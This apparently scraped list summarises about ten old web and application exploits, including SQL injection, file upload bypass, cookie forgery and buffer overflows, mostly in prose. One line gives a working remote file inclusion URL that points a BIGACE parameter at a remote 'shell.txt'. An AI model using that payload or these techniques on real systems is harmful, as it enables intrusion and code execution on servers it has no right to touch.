The LulieBlog 1.2 version is vulnerable to multiple remote vulnerabilities including admin authentication bypass, file upload, and blind SQL injection. The admin authentication bypass vulnerability allows an attacker to modify articles, create new articles, change admin username and blog title, and change admin email. The file upload vulnerability allows an attacker to upload files to the server. The blind SQL injection vulnerability can be exploited using a Perl script.
The Web Slider script version 0.6 and prior suffers from insecure cookie handling. When an admin logs in successfully, a cookie is created without containing any password or other authentication data. By creating a specific cookie, an attacker can impersonate an admin and gain unauthorized access to restricted areas.
By sending a large buffer with specified data, an attacker can stop the Microsoft mssql 7.0 server. The error noticed is different according to the services' pack, but the result is always the same. Exception Codes = c0000005. This code is for educational purposes and the author is not responsible for any acts performed using this exploit.
The vulnerability exists in the /include/fckeditor/editor/filemanager/upload/php/upload.php file of La-Nai CMS version 1.2.16. The code allows an attacker to upload arbitrary files to the server. The file name and extension are obtained from the uploaded file, and the file type is checked against allowed types. However, the check can be bypassed by modifying the 'Type' parameter. This allows an attacker to upload any file, regardless of its extension or type. The uploaded file is saved in the target directory, which can be specified in the configuration file. This can lead to remote code execution or unauthorized access to sensitive information.
The Proof of Concept (PoC) demonstrates two SQL injection vulnerabilities in the Serendipity Weblog application. The first PoC script retrieves the username and MD5 hashed password of the first author from the 'serendipity_authors' table. The second PoC is a URL that can be used in the browser to retrieve the username and password of the first author from the 'serendipity_authors' table.
An attacker can create a crafted CuteFTP macro (*.mcr) and when it's loaded in the target computer, it can download an arbitrary file into the target user's startup folder.
This exploit takes advantage of a buffer overflow vulnerability in the winsock2.h library. By sending a specially crafted input, an attacker can overwrite the buffer and execute arbitrary code.
The vulnerability allows an attacker to include a remote file in the vulnerable file /bigace/system/admin/plugins/menu/menuTree/plugin.php. The exploit URL is http://localhost/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://localhost/shell.txt?
The ClanLite V2 script is vulnerable to SQL injection and XSS attacks. The SQL injection vulnerability can be exploited by an attacker to extract sensitive information from the database. The XSS vulnerability allows an attacker to inject and execute malicious scripts on the affected website.
This exploit targets a buffer overflow vulnerability in the Windows version of Zinf audio player. The vulnerability is present in version 2.2.1 and allows for remote code execution via a malicious .pls playlist file. The exploit generates a file called exploit.pls, which overflows a structured exception handler (SEH) and jumps to a service pack independent address to download and execute a file.
Services By CQR